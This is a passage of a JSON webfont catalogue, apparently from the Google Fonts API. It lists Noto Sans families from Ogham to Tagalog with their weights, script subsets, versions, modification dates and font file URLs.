[\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"ogham\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansogham/v15/kmKlZqk1GBDGN0mY6k5lmEmww4hrt5laQxcoCA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Ol Chiki\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"ol-chiki\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansolchiki/v20/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALWk267I6gVrz5gQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansolchiki/v20/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALVs267I6gVrz5gQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansolchiki/v20/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALbcx67I6gVrz5gQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansolchiki/v20/N0b92TJNOPt-eHmFZCdQbrL32r-4CvhzDzRwlxOQYuVALY4x67I6gVrz5gQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old Hungarian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-hungarian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoldhungarian/v15/E213_cD6hP3GwCJPEUssHEM0KqLaHJXg2PiIgRfjbg5nCYXt.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old Italic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-italic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansolditalic/v15/TuGOUUFzXI5FBtUq5a8bh68BJxxEVam7tWlRdRhtCC4d.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old North Arabian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-north-arabian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoldnortharabian/v15/esDF30BdNv-KYGGJpKGk2tNiMt7Jar6olZDyNdr81zBQmUo_xw4ABw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old Permic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-permic\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoldpermic/v16/snf1s1q1-dF8pli1TesqcbUY4Mr-ElrwKLdXgv_dKYB5.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old Persian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-persian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoldpersian/v15/wEOjEAbNnc5caQTFG18FHrZr9Bp6-8CmIJ_tqOlQfx9CjA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old Sogdian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-sogdian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoldsogdian/v15/3JnjSCH90Gmq2mrzckOBBhFhdrMst48aURt7neIqM-9uyg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old South Arabian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-south-arabian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoldsoutharabian/v15/3qT5oiOhnSyU8TNFIdhZTice3hB_HWKsEnF--0XCHiKx1OtDT9HwTA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Old Turkic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"old-turkic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoldturkic/v15/yMJNMJVya43H0SUF_WmcGEQVqoEMKDKbsE2RjEw-Vyws.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Oriya\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"oriya\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5Ivj0fq_c6LhHBRe-.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5Ivh0f6_c6LhHBRe-.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5Iviqf6_c6LhHBRe-.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5Ivj0f6_c6LhHBRe-.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5IvjGf6_c6LhHBRe-.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5IvgqeK_c6LhHBRe-.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5IvgTeK_c6LhHBRe-.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5Ivh0eK_c6LhHBRe-.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansoriya/v19/AYCppXfzfccDCstK_hrjDyADv5e9748vhj3CJBLHIARtgD6TJQS0dJT5IvhdeK_c6LhHBRe-.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Osage\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"osage\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansosage/v18/oPWX_kB6kP4jCuhpgEGmw4mtAVtXRlaSxkrMCQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Osmanya\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"osmanya\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansosmanya/v18/8vIS7xs32H97qzQKnzfeWzUyUpOJmz6kR47NCV5Z.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Pahawh Hmong\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"pahawh-hmong\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanspahawhhmong/v17/bWtp7e_KfBziStx7lIzKKaMUOBEA3UPQDW7krzc_c48aMpM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Palmyrene\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"palmyrene\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanspalmyrene/v15/ZgNPjOdKPa7CHqq0h37c_ASCWvH93SFCPnK5ZpdNtcA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Pau Cin Hau\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"pau-cin-hau\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanspaucinhau/v19/x3d-cl3IZKmUqiMg_9wBLLtzl22EayN7ehIdjEWqKMxsKw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Phags Pa\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"phags-pa\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansphagspa/v15/pxiZyoo6v8ZYyWh5WuPeJzMkd4SrGChkqkSsrvNXiA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Phoenician\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"phoenician\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansphoenician/v15/jizFRF9Ksm4Bt9PvcTaEkIHiTVtxmFtS5X7Jot-p5561.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Psalter Pahlavi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"psalter-pahlavi\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanspsalterpahlavi/v15/rP2Vp3K65FkAtHfwd-eISGznYihzggmsicPfud3w1G3KsUQBct4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Rejang\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"rejang\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansrejang/v18/Ktk2AKuMeZjqPnXgyqrib7DIogqwN4O3WYZB_sU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Runic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"runic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansrunic/v15/H4c_BXWPl9DZ0Xe_nHUaus7W68WWaxpvHtgIYg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans SC\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanssc/v26/k3kJo84MPvpLmixcA63oeALZTYKL2wv287Sb.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZhaCt9yX6-q2CGg.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssc/v26/k3kXo84MPvpLmixcA63oeALhL4iJ-Q7m8w.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZ3aGt9yX6-q2CGg.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZlaet9yX6-q2CGg.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZraWt9yX6-q2CGg.otf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Samaritan\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"samaritan\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssamaritan/v15/buEqppe9f8_vkXadMBJJo0tSmaYjFkxOUo5jNlOVMzQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Saurashtra\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"saurashtra\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssaurashtra/v18/ea8GacQ0Wfz_XKWXe6OtoA8w8zvmYwTef9ndjhPTSIx9.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Sharada\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sharada\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssharada/v16/gok0H7rwAEdtF9N8-mdTGALG6p0kwoXLPOwr4H8a.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Shavian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"shavian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansshavian/v15/CHy5V_HZE0jxJBQlqAeCKjJvQBNF4EFQSplv2Cwg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Siddham\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"siddham\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssiddham/v17/OZpZg-FwqiNLe9PELUikxTWDoCCeGqndk3Ic92ZH.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans SignWriting\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"signwriting\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssignwriting/v1/Noas6VX_wIWFbTTCrYmvy9A2UnkL-2SZAWiUEVCARYQemg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Sinhala\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sinhala\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwg2b5lgLpJwbQRM.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwo2a5lgLpJwbQRM.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwlOa5lgLpJwbQRM.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwg2a5lgLpJwbQRM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwj-a5lgLpJwbQRM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwtOd5lgLpJwbQRM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwuqd5lgLpJwbQRM.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwo2d5lgLpJwbQRM.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanssinhala/v26/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwqSd5lgLpJwbQRM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Sogdian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"sogdian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssogdian/v15/taiQGn5iC4--qtsfi4Jp6eHPnfxQBo--Pm6KHidM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Sora Sompeng\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sora-sompeng\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssorasompeng/v19/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHR818DpZXJQd4Mu.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanssorasompeng/v19/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHRO18DpZXJQd4Mu.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanssorasompeng/v19/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHSi0MDpZXJQd4Mu.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanssorasompeng/v19/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHSb0MDpZXJQd4Mu.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Soyombo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"soyombo\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssoyombo/v15/RWmSoL-Y6-8q5LTtXs6MF6q7xsxgY0FrIFOcK25W.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Sundanese\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sundanese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssundanese/v19/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6ctxpNNHCizv7fQES.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanssundanese/v19/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6ctxbNNHCizv7fQES.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanssundanese/v19/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6cty3M9HCizv7fQES.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanssundanese/v19/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6ctyOM9HCizv7fQES.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Syloti Nagri\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"syloti-nagri\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssylotinagri/v20/uU9eCAQZ75uhfF9UoWDRiY3q7Sf_VFV3m4dGFVfxN87gsj0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Symbols\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"symbols\"\n      ],\n      \"version\": \"v36\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gfQ4gavVFRkzrbQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3g_Q8gavVFRkzrbQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gIw8gavVFRkzrbQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gfQ8gavVFRkzrbQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gTw8gavVFRkzrbQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gowggavVFRkzrbQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gmgggavVFRkzrbQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3g_QggavVFRkzrbQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanssymbols/v36/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3g1AggavVFRkzrbQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Symbols 2\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"symbols\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssymbols2/v17/I_uyMoGduATTei9eI8daxVHDyfisHr71ypPqfX71-AI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Syriac\",\n      \"variants\": [\n        \"100\",\n        \"regular\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"syriac\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanssyriac/v15/KtkwAKuMeZjqPnXgyqribqzQqgW0D-e9XaRE7sX5Cg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanssyriac/v15/Ktk2AKuMeZjqPnXgyqribqzQqgW0N4O3WYZB_sU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanssyriac/v15/KtkxAKuMeZjqPnXgyqribqzQqgW0DweafY5q4szgE-Q.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans TC\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"chinese-traditional\",\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanstc/v26/-nFlOG829Oofr2wohFbTp9i9WyEJIfNZ1sjy.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9kwMvDd1V39Hr7g.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanstc/v26/-nF7OG829Oofr2wohFbTp9iFOSsLA_ZJ1g.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9ywIvDd1V39Hr7g.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9gwQvDd1V39Hr7g.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9uwYvDd1V39Hr7g.otf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Tagalog\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tagalog\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": 